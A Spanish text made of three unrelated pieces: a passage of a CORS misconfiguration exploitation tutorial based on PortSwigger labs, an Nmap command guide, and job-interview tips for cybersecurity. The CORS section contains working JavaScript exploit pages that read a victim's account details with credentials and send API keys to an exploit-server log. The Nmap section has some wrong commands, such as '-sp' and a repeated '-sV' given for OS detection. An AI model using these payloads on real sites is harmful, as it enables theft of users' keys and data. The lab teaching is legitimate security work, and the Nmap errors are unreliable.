Figura 3 — muestra el valor de la cabecera Origin incluido en la cabecera Access-Control-Allow-Origin.

2. Orígenes Modificados

Poner la cabecera Origin a un valor que coincida con el dominio objetivo, pero agregar un prefijo o sufijo al dominio para verificar si hay cualquier validación sobre los inicios o finales del dominio.

Si no hay controles, podemos crear un dominio coincidente similar que elude la política de CORS en el dominio de destino. Por ejemplo, agregando un prefijo o sufijo al dominio metrics.com sería algo como attackmetrics.com o metrics.com.attack.com.

El riesgo de esta configuración errónea es considerado alto si el dominio permite pasar credenciales con la cabecera Access-Control-Allow-Credentials se ponga a true. El atacante puede crear un dominio de coincidente similar y recuperar información sensible del dominio de destino.

Pero el riesgo sería bajo si las solicitudes no autenticados no estuvieran permitidos.

📌 Para explotar orígenes modificados, verifica la sección de explotación — Caso #1.

3. Subdominios de confianza con Protocolo Inseguro

Poner la cabecera Origin a un subdominio existente y ver si lo acepta. Si lo hace, significa que el dominio confía a todos sus subdominios. Esto no es una buena idea si uno de los subdominios tiene una vulnerabilidad de Secuencia de comandos entre Sitios (XSS), permitirá al atacante que inyecte un payload de JS malicioso y realizar acciones no autorizados.

Esta configuración errónea se considera de alto riesgo el dominio acepta subdominios con un protocolo inseguro, tales como HTTP, y la cabecera credencial se pone a true. De lo contrario, no será explotable y sería solamente una implementación pobre de CORS.

📌 Para explotar subdominios de confianza, verifica la sección de expltación — Caso #3.

Figura 4 — muestra la aplicación acepta subdominios inseguros arbitrarios.

4. Orígen Null

Pon la cabecera Origin al valor null – Origin: null, y ve si la aplicación pone la cabecera Access-Control-Allow-Origin a null. Si lo hace, significa que los orígenes null están en la lista blanca.

El nivel de riesgo es considerado alto si el dominio permite solicitudes autenticados con la cabecera Access-Control-Allow-Credentials puesto a true.

Pero si no lo hace, entonces el problema es considerado bajo, y no explotable.

📌 Para explotar los Orígenes Null, verifica la sección explotación – Caso #2.

Figura 5 — muestra que la aplicación aceptó el valor null y lo regresó en la respuesta.

Casos explotables de CORS

En esta sección, veremos cómo explotar las configuraciones erróneas de CORS al categorizarlos como casos de prueba para una fácil comprensión.

Caso 1: Origen Reflejado

La aplicación es consideraba vulnerable cuando pone el Access-Control-Allow-Origin al dominio que fue suplido por el atacante y permite pasar credenciales con el Access-Control-Allow-Credentials puesto a true.

Access-Control-Allow-Origin: http://attacker-domain.com
Access-Control-Allow-Credentials: true

Figura 6 — muestra las cabeceras de CORS para orígen reflejado.

La explotación requiere que el atacante aloje el script de JS en un servidor externo para que sea accesible al usuario. Luego tienen que crear una página HTML, incrustar el script de JS abajo, y enviarlo al usuario.

<html>
  <body>
    <script>

    #Inicializa el objeto XMLHttpRequest, y la variable URL de la aplicacion 
        var req = new XMLHttpRequest();
        var url = ("APPLICATION URL");

    #El objeto MLHttpRequest carga, ejecuta la función reqListener()
      req.onload = retrieveKeys;

    #Realiza la solicitud GET a la ubicación accounDetails de la aplicacion
        req.open('GET', url + "/accountDetails",true);

    #Permite pasar credenciales con las solicitudes
    req.withCredentials = true;

    #Envía la solicitud
        req.send(null);

    function retrieveKeys() {
            location='/log?key='+this.responseText;
        };

  </script>
  <body>
</html>

Una vez que el usuario vistia la página alojada, automáticamente enviará una solicitud de CORS para recuperar información sobre el usuario de la ubicación especificado en el script. Entender la estructura de la aplicación y donde almacena su información sensible es esencial para este paso.

El script de arriba comienza con inicializar el objeto (XHR) XMLHttpRequest que instruya al navegador web que transferiremos datos al y desde el servidor web usando el protocolo HTTP. XHR es una API del navegador que permite a los lenguajes del lado del cliente tales como JavaScript que realice solicitudes HTTP a un servidor y reciba sus respuestas de forma dinámica sin requerir que el usuario refresque la página.

Luego, le decimos al objeto que ejecute una función llamada retrieveKeys que solicite la clave API del admin y nos envíe la respuesta cuando cargue.

Después, hacemos una solicitud GET especificando la ubicación del cual queremos obtener información y pasar nuestras credenciales con la función Credentials puesto a true.

La solicitud automáticamente será bloqueada y denegada si el servidor de la aplicación no permite pasar credenciales entre dominios. Pero sabemos que esto no sucederá aquí porque el Access-Control-Allow-Credentials está puesto a true.

Para demostrar cómo funciona el script, usaré el servidor de exploits PortSwigger el cual está disponible con el laboratorio para alojar el script de arriba.

Inicia sesión en la aplicación, haz clic en “Go to exploit server,” y pega el script en el body (cuerpo). Luego haz clic en “Deliver exploit to victim.” En un escenario real, necesitas enviar el enlace al usuario e intentar atraerlos para que le hagan clic.

Figuras 7 & 8 — muestra el proceso de alojar el payload de JS y entregarlo al usuario.

Después de repartir el exploit, haz clic en “Access log” y deberías ser capaz de ver la clave API del admin capturado en los logs. Copia la cadena que tiene la clave y pégalo en Decoder de Burp Suite y decodifícalo como una URL para recuperar el valor cleartext.

Figuras 9 & 10 — muestran la clave API del admin en los logs y el valor de la clave en texto plano en el Decoder.

Caso 2: Origen Null

La aplicación es considerada vulnerable cuando pone el Access-Control-Allow-Origin al valor null y permite pasar credenciales con el Access-Control-Allow-Credentials puesto a true.

Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

Figura 11 — muestra que el servidor de la aplicación acepta orígenes null.

La explotación requiere que el archivo script de JS que hospedemos sea accesible al usuario objetivo (lo mismo que en el caso #1). Nuevamente, usaremos el mismo script – solo esta vez, agregaremos un sandbox iframe para recuperar la clave API. La propiedad sandbox pone el origen del frame a null así podemos poner la cabecera Origin al valor null.

<html>
    <body>
        <iframe style="display: none;" sandbox="allow-scripts" srcdoc="
        <script>
            var req = new XMLHttpRequest();
            var url = 'APPLICATION URL'
            req.onload = retrieveKeys;

            req.open('GET', url + '/accountDetails', true);
            req.withCredentials = true;
            req.send(null);

           function retrieveKeys() {
               fetch('https://Exolit_Server_Hostname/log?key=' + req.responseText)
            }
        </script>"></iframe>
    </body>
</html>

Cuando el usuario autenticado hace clic en nuestro enlace http://192.168.1.14:5555/cors_null_poc.html, obtendremos la clave API de los detalles de la cuenta. Pero siendo que nuestro usuario no es un administrador, no seremos capaz de recuperar la clave API del administrador.

El punto de mostrar los pasos de abajo es que durante una evaluación de prueba de una aplicación web, como un tester, se te dará las cuentas de usuario regular y administrador para probarlos. En esos casos, sigues los pasos de abajo para mostrar tu prueba de concepta al hospedar el archivo de forma local. O, por supuesto, puedes hospedar el archivo de forma externa como una opción alternativa.

Figuras 12 & 13 — muestra que el valor null se agrega a la cabecera de la solicitud, y el usuario accedió a la página cors_nullpoc.

Figura 14 — muestra los detalles de la cuenta de usuario cuando se hace clic al enlace.

Caso 3: Subdominios Confiables

La aplicación es considerada vulnerable cuando se pone Access-Control-Allow-Origin a cualquiera de sus subdominios y se permite credenciales con Access-Control-Allow-Credentials puesto a true.

La explotación de este caso es dependiente en si el subdominio existente es vulnerable a los ataques XSS para permitir al atacante que abuse de la configuración errónea.

Access-Control-Allow-Origin: subdomainattacker.example.com
Access-Control-Allow-Credentials: true

Figura 15 — muestra que el domino acepta sus orígenes de los subdominios.

Su te encuentras este escenario, necesitas verificar todos los subdominios existentes e intentar de encontrar una con una vulnerabilidad de XSS para explotarlo.

En el laboratorio Port Swigger #3, la aplicación confía que su subdominio – stock – es vulnerable a ataques de XSS en el parámetro ProductId=.

Figuras 16 & 17 — muestra que el subdominio de acciones es vulnerable a ataques de XSS en el parámetro ProductId.

Usaremos el mismo escript para explotar este caos, con excepción que agregaremos la ubicación donde inyectamos el payload usando la función document.location. Luego formatearemos el payload para que sea un payload de una línea así podemos pasarle en el parámetro.

<script>
    document.location="http://subdomain.domain.com/?productId=<script>
    <script>
       var req = new XMLHttpRequest();
       req.onload = retrieveKeys;
       req.open('GET', "APPLICATION URL/accountDetails",true);
       req.withCredentials = true;
       req.send(null);

       function retrieveKeys() {
            location='https://Exolit_Server_Hostname/log?key='+this.responseText;
        };

  </script> 
      </script>

Después de eso, guardamos el script como cors_poc.html, lo hospedamos en nuestro servidor, y enviamos el enlace al usuario.

<html>
<body>
<script>
    document.location="http://Insecure-subdomain/?productId=<script>var req = new XMLHttpRequest(); req.onload = retrieveKeys; req.open('get','APPLICATION URL/accountDetails',true); req.withCredentials = true;req.send();function retrieveKeys() {location='https://exploit-0a110003034945dec57758a8018500a8.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
</body>
</html>

Como puedes ver abajo en las capturas de pantalla, cuando el usuario accede al enlace, el script inyecta el payload en el parámetro productId y recupera la clave API.

Figuras 18, 19 & 20 — muestra la inyección del payload XSS y captura la clave APi en acción.

Caso Inexplotable: Comodín (*)

La aplicación NO es vulnerable cuando Access-Control-Allow-Origin es puesto al comodín *, inclusive si la cabecera Access-Control-Allow-Credentials es puesto a true.

Esto se debe a que hay una verificación de seguridad que desactiva la cabecera Allow-Credentials cuando el origin es puesto a un comodín.

Mitigaciones

• Implementa las cabeceras de CORS apropiadas: El servidor puede agregar cabeceras de CORS apropiadas para permitir solicitudes entre orígenes solamente de sitios confiables.
• Restringe acceso a datos sensibles: Esimportante restringir acceso a datos sensible a dominios confiables solamente. Esto se puede haceral implementar medidas de acceso de control tales como autenticación y autorización.

Concluyendo

En este tutorial, hemos cubierto lo básico de CORS como una característica de seguridad que previene que las páginas web hagan solicitudes no autorizados a distintos dominios.

También cubrimos las técnicas de prueba estándares de CORS para detectar y explotar configuraciones erróneas de CORS con herramientas como Burp Suites y las herramientas de desarrollo de Chrome.

Al implementar y probar CORS correctamente, los desarrolladores web puede asegurar que sus aplicaciones web están seguras y evitar configuraciones erróneas que permiten a los atacantes acceder a recursos no autorizados y comprometer la seguridad de la aplicación.

Recursos

• https://ranakhalil.teachable.com/p/web-security-academy-video-series
• https://www.trustedsec.com/blog/cors-findings/
• https://www.we45.com/post/3-ways-you-can-exploit-cors-misconfigurations
• https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/

Nmap es la herramienta de escaneo más famosa utilizada por los pentesters. En este artículo, veremos algunas características principales de Nmap junto con algunos comandos útiles.

¿Qué es Nmap?

Nmap es la abreviatura de Network Mapper. Es una herramienta de línea de comandos de Linux de código abierto que se utiliza para escanear direcciones IP y puertos en una red y para detectar aplicaciones instaladas.

Nmap permite a los administradores de red encontrar qué dispositivos se están ejecutando en su red, descubrir puertos y servicios abiertos y detectar vulnerabilidades.

Gordon Lyon (seudónimo Fyodor) escribió Nmap como una herramienta para ayudar a mapear una red completa fácilmente y encontrar sus puertos y servicios abiertos.

Nmap se ha vuelto muy popular y aparece en películas como The Matrix y la popular serie Mr. Robot.

¿Por qué usar Nmap?

Hay una serie de razones por las que los profesionales de la seguridad prefieren Nmap a otras herramientas de análisis.

Primero, Nmap te ayuda a mapear rápidamente una red sin comandos ni configuraciones sofisticados. También admite comandos simples (por ejemplo, para verificar si un host está activo) y secuencias de comandos complejas a través del motor de secuencias de comandos Nmap.

Otras características de Nmap incluyen:

• Capacidad para reconocer rápidamente todos los dispositivos, incluidos servidores, enrutadores, conmutadores, dispositivos móviles, etc. en redes únicas o múltiples.
• Ayuda a identificar los servicios que se ejecutan en un sistema, incluidos los servidores web, los servidores DNS y otras aplicaciones comunes. Nmap también puede detectar versiones de aplicaciones con una precisión razonable para ayudar a detectar vulnerabilidades existentes.
  
• Nmap puede encontrar información sobre el sistema operativo que se ejecuta en los dispositivos. Puede proporcionar información detallada, como las versiones del sistema operativo, lo que facilita la planificación de enfoques adicionales durante las pruebas de penetración.
  
• Durante la auditoría de seguridad y el escaneo de vulnerabilidades, puedes usar Nmap para atacar sistemas usando scripts existentes del motor de scripting de Nmap.
  
• Nmap tiene una interfaz gráfica de usuario llamada Zenmap. Te ayuda a desarrollar mapeos visuales de una red para una mejor usabilidad y generación de informes.

Comandos

Veamos algunos comandos de Nmap. Si no tienes Nmap instalado, puedes obtenerlo desde aquí.

Escaneos básicos

Escanear la lista de dispositivos activos en una red es el primer paso en el mapeo de la red. Hay dos tipos de escaneos que puedes usar para eso:

• Escaneo de ping: Escanea la lista de dispositivos en funcionamiento en una subred determinada.

> nmap -sp 192.168.1.1/24

• Escanear un solo host: Escanea un solo host en busca de 1000 puertos conocidos. Estos puertos son los que utilizan servicios populares como SQL, SNTP, apache y otros.

> nmap scanme.nmap.org

Escaneo sigiloso

El escaneo sigiloso se realiza enviando un paquete SYN y analizando la respuesta. Si se recibe SYN/ACK, significa que el puerto está abierto y puedes abrir una conexión TCP.

Sin embargo, un escaneo sigiloso nunca completo el protocolo de enlace de 3 vías , lo que dificulta que el objetivo determine el sistema de escaneo.

> nmap -sS scanme.nmap.org

Puedes usar el comando '-sS' para realizar un escaneo sigiloso. Recuerda, el escaneo sigiloso es más lento y no tan agresivo como los otros tipos de escaneo, por lo que es posible que debas esperar un tiempo para obtener una respuesta.

Escaneo de versiones

Encontrar versiones de aplicaciones es una parte crucial en las pruebas de penetración.

Te facilita la vida, ya que puedes encontrar una vulnerabilidad existente en la base de datos de Vulnerabilidades y Exploits Comunes (CVE) para una versión particular del servicio. Luego puedes usarlo para atacar una máquina usando una herramienta de explotación como Metasploit .

> nmap -sV scanme.nmap.org

Para hacer un escaneo de versión, usa el comando '-sV'. Nmap proporcionará una lista de servicios con sus versiones. Ten en cuenta que los escaneos de versiones no siempre son 100% precisos, pero te acercan un paso más para ingresar con éxito a un sistema.

Escaneo del sistema operativo

Además de los servicios y sus versiones, Nmap puede proporcionar información sobre el sistema operativo subyacente mediante huellas dactilares de TCP/IP. Nmap también intentará encontrar el tiempo de actividad del sistema durante una exploración del sistema operativo.

> nmap -sV scanme.nmap.org

Puedes usar las banderas adicionales como osscan-limit para limitar la búsqueda a algunos objetivos esperados. Nmap mostrará el porcentaje de confianza para cada conjetura del sistema operativo.

Una vez más, la detección del sistema operativo no siempre es precisa, pero contribuye en gran medida a ayudar a un pen tester a acercarse a su objetivo.

Escaneo agresivo

Nmap tiene un modo agresivo que permite la detección del sistema operativo, la detección de versiones, el escaneo de scripts y el rastreo de rutas. Puedes utilizar el argumento -A para realizar un análisis agresivo.

> nmap -A scanme.nmap.org

Los escaneos agresivos brindan mucha mejor información que los escaneos regulares. Sin embargo, un análisis agresivo también envía más sondeos y es más probable que se detecte durante las auditorías de seguridad.

Escaneo de varios hosts

Nmap tiene la capacidad de escanear múltiples hosts simultáneamente. Esta característica es muy útil cuando administras una gran infraestructura de red.

Puedes escanear múltiples hosts a través de numerosos enfoques:

• Escribe todas las direcciones IP en una sola fila para escanear todos los hosts al mismo tiempo.

> nmap 192.164.1.1 192.164.0.2 192.164.0.2

• Utiliza el asterisco (*) para escanear todas las subredes a la vez.

> nmap 192.164.1.*

• Agrega comas para separar las terminaciones de las direcciones en lugar de escribir los dominios completos.

> nmap 192.164.0.1,2,3,4

• Usa un guion para especificar un rango de direcciones IP

> nmap 192.164.0.0–255

Escaneo de puertos

El escaneo de puertos es una de las características más fundamentales de Nmap. Puedes buscar puertos de varias maneras.

• Usando el parámetro -p para buscar un solo puerto

> nmap -p 973 192.164.0.1

• Si especificas el tipo de puerto, puedes buscar información sobre un tipo particular de conexión, por ejemplo, para una conexión TCP.

> nmap -p T:7777, 973 192.164.0.1

• Se puede escanear un rango de puertos separándolos con un guion.

> nmap -p 76–973 192.164.0.1

• También puede usar el indicador -top-ports para especificar los n puertos principales para escanear.

> nmap --top-ports 10 scanme.nmap.org

Escaneo desde un archivo

Si deseas escanear una gran lista de direcciones IP, puedes hacerlo importando un archivo con la lista de direcciones IP.

> nmap -iL /input_ips.txt

El comando anterior producirá los resultados del escaneo de todos los dominios dados en el archivo "input_ips.txt". Además de simplemente escanear las direcciones IP, también puedes usar opciones y banderas adicionales.

Verbosidad y exportación de resultados de escaneo

Las pruebas de penetración pueden durar días o incluso semanas. Exportar los resultados de Nmap puede ser útil para evitar trabajo redundante y ayudar a crear informes finales. Veamos algunas formas de exportar los resultados del escaneo de Nmap.

Salida detallada

> nmap -v scanme.nmap.org

La salida detallada proporciona información adicional sobre el análisis que se está realizando. Es útil monitorear paso a paso las acciones que Nmap realiza en una red, especialmente si eres un extraño que escanea la red de un cliente.

Salida normal

Los escaneos de Nmap también se pueden exportar a un archivo de texto. Será ligeramente diferente de la salida de la línea de comandos original, pero capturará todos los resultados de escaneo esenciales.

> nmap -oN output.txt scanme.nmap.org

Salida XML

Los escaneos de Nmap también se pueden exportar a XML. También es el formato de archivo preferido de la mayoría de las herramientas de prueba de penetración, lo que lo hace fácilmente analizable al importar resultados de escaneo.

> nmap -oX output.xml scanme.nmap.org

Múltiples Formatos

También puedes exportar los resultados del escaneo en todos los formatos disponibles a la vez usando el comando -oA.

> nmap -oA output scanme.nmap.org

El comando anterior exportará el resultado del escaneo en tres archivos: salida.xml, salida. Nmap y salida.gnmap.

Ayuda Nmap

Nmap tiene un comando de ayuda incorporado que enumera todas las banderas y opciones que puedes usar. A menudo es útil dada la cantidad de argumentos de línea de comandos con los que viene Nmap.

> nmap -h

Motor de secuencias de comandos Nmap

Nmap Scripting Engine (NSE) es una herramienta increíblemente poderosa que puedes usar para escribir scripts y automatizar numerosas funciones de red.

Puedes encontrar muchos scripts distribuidos en Nmap o escribir tu propio script según tus requisitos. Incluso puedes modificar scripts existentes usando el lenguaje de programación Lua .

NSE también tiene secuencias de comandos de ataque que se utilizan para atacar la red y varios protocolos de red.

Repasar el motor de secuencias de comandos en profundidad estaría fuera del alcance de este artículo, por lo que aquí hay más información sobre el motor de secuencias de comandos Nmap.

Zenmap

Zenmap es una interfaz gráfica de usuario para Nmap. Es un software gratuito y de código abierto que te ayuda a comenzar a utilizar Nmap.

Además de proporcionar mapeos de red visuales, Zenmap también te permite guardar y buscar tus escaneos para uso futuro.

Zenmap es excelente para los principiantes que desean probar las capacidades de Nmap sin pasar por una interfaz de línea de comandos.

Conclusión

Nmap es claramente la "navaja suiza" de las redes, gracias a su inventario de comandos versátiles.

Te permite escanear y descubrir rápidamente información esencial sobre tu red, hosts, puertos, firewalls y sistemas operativos.

Nmap tiene numerosas configuraciones, indicadores y preferencias que ayudan a los administradores de sistemas a analizar una red en detalle.

Si deseas aprender Nmap en profundidad, este es un gran recurso.

¿Te encantó este artículo? Únete a mi Newsletter y recibe un resumen de mis artículos y videos todos los lunes.

La ciberseguridad es uno de los campos tecnológicos de más rápido crecimiento. Hubo más de 3,5 millones de puestos de trabajo vacantes previstos para finales de 2021. Ha habido una tasa de desempleo del 0% desde 2011 y el gasto en dichos servicios alcanzó los 123 mil millones de dólares en 2020.

Ya sea te hayas graduado recién, o estés buscando hacer un cambio en tu carrera, saber cómo posicionarse mejor en una entrevista puede darte la ventaja.

He estado trabajando en seguridad informática durante más de 10 años y me especialicé en Sistemas de Información Empresarial y Lenguas y Literaturas Clásicas (odiaba las matemáticas, así que la carrera de Informática estaba descartada).

El quid de la cuestión es que no necesitas una formación académica en informática para comenzar en el área de ciberseguridad, solo necesitas tener curiosidad y aplicación a la hora de aprender.

A continuación te presento 10 consejos que he reunido para que puedas orientarte en tu preparación para buscar tu primer o próximo puesto laboral en el área de ciberseguridad.

0. Aplica al trabajo

Olvídate de las calificaciones enumeradas en la publicación del trabajo (bueno, tal vez no del todo). ¿El trabajo parece interesante? ¿Te gustaría trabajar en la empresa? ¿Tienes algunos de los criterios? ¡Entonces aplica!

Con demasiada frecuencia, he visto a personas muy calificadas que no solicitan puestos de trabajo porque sienten que no cumplirán con todos los criterios enumerados. Pero si cree que puede cumplir con algunos de los requisitos, presenta su solicitud y al menos tendrás un diálogo.

A menudo, los gerentes de contratación terminan lanzando todos los requisitos que se les ocurren en la descripción del trabajo, en lugar del mínimo necesario para el puesto. Olvídate también de los requisitos de pregrado: algunas de las empresas más grandes del mundo ya no requieren títulos.

1. Participa en una comunidad de ciberseguridad

Únete a grupos de reuniones locales o participa en competencias Capture the Flag, como las organizadas por la National Cyber League. Estos eventos están abiertos tanto para principiantes como para personas con experiencia, y ayudan a demostrar su pasión y compromiso con el crecimiento de la ciberseguridad.

A menudo instruyo a nuestros reclutadores para que resalten cualquier currículum que encuentren donde vean que el candidato participó en eventos de seguridad cibernética.

En cada entrevista que realizo, siempre pregunto cómo el candidato se mantiene al día con la seguridad cibernética; este es un buen momento para hablar sobre su lista de lectura, proyectos y los eventos y grupos de los que forma parte.

2. Realiza tu propia investigación

Un área en la que veo que los candidatos se destacan del resto es cuando demuestran que han investigado mi empresa y la industria en la que se encuentra. Cada candidato debe estar preparado para responder "¿Qué amenazas ve contra mi empresa y qué consejo le daría a los líderes para mitigar estas amenazas?".

Aún mejor, si conoces el nombre de tu entrevistador antes de la entrevista; dedica un tiempo a investigarlo en LinkedIn para tener una idea de sus antecedentes.
Una de las mejores entrevistas que realicé fue con un candidato que en realidad realizó un reconocimiento en mi empresa antes de la entrevista.

Buscaron la información de mi empresa en Shodan, Google y otras vías para tener una idea de la exposición potencial y una comprensión de nuestra presencia pública.

Nota: No intentes escanear activamente la infraestructura de la empresa ni informar vulnerabilidades durante tu entrevista. Este tipo de actividad se encuentra en el área gris de la legalidad en el mejor de los casos, y probablemente no te ganará la simpatía del entrevistador.

3. Mantente al tanto de las tendencias

Cualquier candidato al que entrevisto, debería poder darme información básica sobre las últimas tendencias en ciberseguridad. Esto incluye poder discutir qué es "WannaCry", sus pensamientos sobre infracciones recientes (como el reciente ataque de SolarWinds) y sus sugerencias sobre cómo prevenir, contener, responder y recuperarse del ransomware.

Dependiendo de la antigüedad, es posible que no espere información técnica detallada, pero se requiere (al menos) una comprensión superficial.

4. La presentación es importante

Si bien puede ser tedioso, debes asegurarte de adaptar tu currículum y carta de presentación para resaltar las áreas de interés que están en línea con la oferta de trabajo. Adapta tu currículum al trabajo que estás solicitando; no agregues una larga lista de información innecesaria.

Introducción

La primera parte del currículum, además de su nombre e información de contacto, debe ser un breve párrafo introductorio que realmente me convenza. Explica lo que traes a la mesa: esta sección te ayuda a diferenciarte de los otros currículos que solo enumeran la experiencia laboral sin dar contexto.

Experiencia laboral

Enumera la posición más actual que tienes y luego continúa con la lista en orden inverso. Prepárate para discutir cualquier brecha notable en el empleo. Si has estado en el ámbito profesional durante bastante tiempo, no necesitas enumerar todas las carreras: 10-15 años es un buen rango para mostrar. Nadie quiere leer un currículum de diez páginas, así que asegúrate de que cada espacio sea relevante. Evita los acrónimos cuando sea posible. Adicionalmente, puedes proporcionar al menos tres viñetas para cada trabajo que figura en el currículum. En caso de hacerlo, asegúrate de que estas viñetas enumeren tus logros y, cuando sea posible. Proporciona números concretos en lugar de texto vago. Por ejemplo, "Logré una reducción de costes del 60%" suena mejor que "Ahorré dinero de la compañía".

Una nota sobre la gramática: Usa el tiempo presente para el trabajo en el que estás trabajando y el tiempo pasado para todos los roles anteriores. Además, utiliza el corrector de gramática y ortografía en el programa de procesamiento de texto. Un currículum mal escrito a menudo es rechazado incluso antes de que se envíe al gerente de contratación.

Membresías profesionales, publicaciones, charlas y certificaciones

Si corresponde, usa esta sección para enumerar las juntas, comunidades u organizaciones profesionales a las que perteneces, así como su membresía (por ejemplo, miembro, director, fundador, etc.). Esto ayuda a mostrarle al gerente de contratación tu participación en la comunidad fuera de su trabajo diario y, en general, te convierte en un candidato más atractivo.

Siéntete libre de agregar membresías relevantes o interesantes fuera de los grupos de seguridad informática, como un líder de tropa de Girl Scouts o un miembro de la junta de una organización sin fines de lucro. Si su publicación o participación como orador está disponible en línea, incluya enlaces al contenido. Por último, enumera tus certificaciones, incluido el organismo emisor y cuándo obtuvo la certificación.

Habilidades técnicas

Ojo con este apartado. Es tentador enumerar todos los términos técnicos bajo el sol aquí, pero debes concentrarte en las habilidades que crees que te convertirán en un activo para el puesto al que se postula.

Mi primer "filtro" aquí es cuando los candidatos colocan "conocimientos genéricos" como"OSI model", "TCP", "IP", "SSH", "Windows operating system", "Mac operating system", o incluso una simple lista de herramientas de seguridad.

Cuando un gerente de contratación ve una sección de habilidades técnicas que solo enumera las herramientas de seguridad, su primer pensamiento suele ser "¿Puede este candidato desempeñarse si no tuviera acceso a estas herramientas?"

Precaución: Si incluyes una habilidad en tu currículum, prepárate para discutirla. Aprendí esto yo mismo en una entrevista en la que me hicieron una serie de preguntas muy técnicas sobre el lenguaje Python simplemente porque lo puse en mi currículum.

5. Desarrolla tus habilidades duras

Habilidades de programación

Si bien no se requiere para muchos roles, presto atención a los currículos que indican que el candidato tiene algún tipo de experiencia en desarrollo o codificación.

Si no tienes experiencia formal en desarrollo, pero puedes hacer algo de programación básica (toda mi "programación" implica tener StackOverflow abierto en una ventana del navegador). Definitivamente, debes incluir eso en su currículum.

Si has contribuido a algún proyecto de código abierto, o has trabajado en el código usted mismo, asegúrate de que también esté resaltado en tu currículum; esto es algo que trato de buscar en los currículums. Sitios como freeCodeCamp, CodeBashing, y LeetCode pueden ayudar a proveer un fundamento sólido en scripting y coding.

Fundamentos tecnológicos

Comprender cómo funciona un sistema es fundamental para poder protegerlo de manera eficiente. Según el puesto que estás solicitando, asegúrate de poder comunicar sobre tecnologías relevantes. De forma que proveas información sobre los ataques y las defensas relevantes para la tecnología.

Por ejemplo, si voy a contratar a un ingeniero de seguridad de redes, espero que el candidato explique qué es el DNS, cómo funciona a un alto nivel y qué protocolo usa, etc.

6. Desarrolla tus habilidades blandas

Habilidades de Comunicación

Comunicarse bien es una de las habilidades más importantes que cualquier profesional de ciberseguridad puede tener. La mayoría de las organizaciones tienen un tamaño de equipo limitado para la seguridad cibernética y, como tal, se espera que hables con el personal de la gerencia que no tiene tu nivel de experiencia técnica.

Un elemento que busco en cualquier currículum es si el candidato ha enumerado compromisos para hablar en público, como presentar un tema en una conferencia. Espero que cualquier miembro del equipo pueda hablar con los empleados y desglosar temas complejos de ciberseguridad en información procesable y fácil de digerir.

También suelo buscar acerca de si quien aplica ha enumerado compromisos para hablar en público, como presentar un tema en una conferencia. Espero que cualquier miembro del equipo pueda hablar con los empleados y desglosar temas complejos de ciberseguridad en información procesable y fácil de digerir.

Habilidades de Liderazgo

Estas habilidades son realmente difíciles de poner por escrito. Sin embargo, espero que cualquier candidato sea (eventualmente) capaz de liderar iniciativas y proyectos de ciberseguridad.
Es importarte venir a la entrevista con preparación para discutir cualquier proyecto, ya sea de su carrera o un proyecto o actividad paralela (por ejemplo, entrenamiento, tutoría, etc.), en el que tuvo que tomar la iniciativa y lo que aprendió de la experiencia.

Habilidades de organización

Ser una persona organizada es una habilidad clave que debe poseer cualquier candidato de éxito. No importa qué tan buenas sean sus habilidades técnicas, si tiene dificultades para cumplir con los plazos o para realizar múltiples tareas (la ciberseguridad funciona a un ritmo rápido: es muy difícil tener tiempo ininterrumpido para concentrarse en una tarea); entonces será difícil tener éxito. Sobre todo en un equipo técnico

7. Demuestra experiencia práctica

No necesitas tener experiencia profesional formal para solicitar un trabajo de ciberseguridad. Sin embargo, puedes obtener una ventaja sobre la competencia al demostrar proyectos y habilidades que has aprendido que son relevantes para la ciberseguridad.

Si tienes un enlace de GitHub a un proyecto en el que trabajaste, o si decidiste probar la creación de un clúster de Kubernets en varias Raspberry Pi, ¡agrégalo a su currículum!

8. Mantén tu resumen relevante

Con demasiada frecuencia recibo CVs que ocupan mucho espacio y enumeran cursos universitarios completos relacionados con la ciberseguridad cuando el candidato ha estado en el campo durante más de 5 años.

Asegúrate que tu currículum solo incluya información relevante. Pese a ello, también es posible la experiencia relevante en un área distinta o afín a la ciberseguridad, ya que siempre es agradable ver la diversidad de experiencias.

Las clases universitarias y un GPA elevado, realmente no son relevantes a menos que estés solicitando tu primer trabajo.
Por otra parte, no soy de la opinión de que un currículum debe, pase lo que pase, ser de una sola página, el contenido no debe sentirse flojo. Rara vez veo la necesidad de que un currículum tenga más de una página, a menos que haya pasado años en el campo en varios roles.

9. Sé profesional

La ciberseguridad en general tiende a ser una industria relativamente informal (más aún en la era de las entrevistas digitales). Sin embargo, las primeras impresiones son extremadamente importantes, así que afianza el hecho de vestirte y actuar profesionalmente durante su entrevista (¡Y también si te contratan!).

He visto entrevistas a candidatos con camisetas manchadas, camisetas con gráficos inapropiados y otros atuendos poco profesionales. Esta es tu oportunidad de causar una buena impresión, y aunque no diría que necesitas vestirse con traje y corbata, como mínimo debes vestirte con ropa informal de negocios, similar a la que usarías si tuvieras que venir a una oficina.

Además de lo que vistes, la forma en que hablas es extremadamente importante. Aun si hemos tenido malos gerentes en el pasado o trabajado para compañías terribles; que no pase en tu entrevista el hablar mal de empleadores o empresas anteriores. Si te preguntan por qué te vas, o qué problemas tuviste con un trabajo, es mejor simplemente decir que el trabajo "no encajaba bien" y dejarlo así. No querrás que el entrevistador asuma que así es como hablarías de ellos.

La forma en que se comporta un candidato y qué tan diplomático es extremadamente importante. Dado lo pequeños que son muchos equipos de ciberseguridad, puedes encontrarte hablando con el gerente, y el entrevistador estará atento a cómo cree que te comportarías en esas situaciones.
Por último, y esto debería ser evidente, es siempre ser cortés. Ya sea con el reclutador de recursos humanos, el reclutador externo, el entrevistador o la recepcionista, siempre sé cortés. Las personas no quieren contratar y trabajar con alguien que consideran grosero o irrespetuoso.

10. El método STAR

La ciberseguridad es un campo de alto riesgo y ritmo acelerado donde el pensamiento crítico y analítico, la gestión del ego (el tuyo y el de los demás), la resolución de conflictos y el liderazgo juegan un papel clave en el éxito del equipo.

Los entrevistadores suelen buscar a alguien que tenga una mentalidad de hacker, alguien que sea innovador y pueda pensar críticamente para resolver problemas.

Ven preparado para discutir situaciones en las que ha tenido que lidiar con prioridades en conflicto, resolver problemas complejos, explicar información técnica a una audiencia no técnica e incluso discutir áreas donde ves oportunidades de crecimiento en tu desempeño.

Si bien no entraré en varios escenarios en esta publicación, un resultado clave que busco es si el candidato comprende cómo enmarcar el riesgo de ciberseguridad.

Hay momentos en los que es necesario tomar riesgos, y; es nuestro trabajo proporcionar la información adecuada para que las decisiones que se tomen sean informadas. Lo bien que un candidato puede analizar un problema vale más que la experiencia escrita en el currículum.

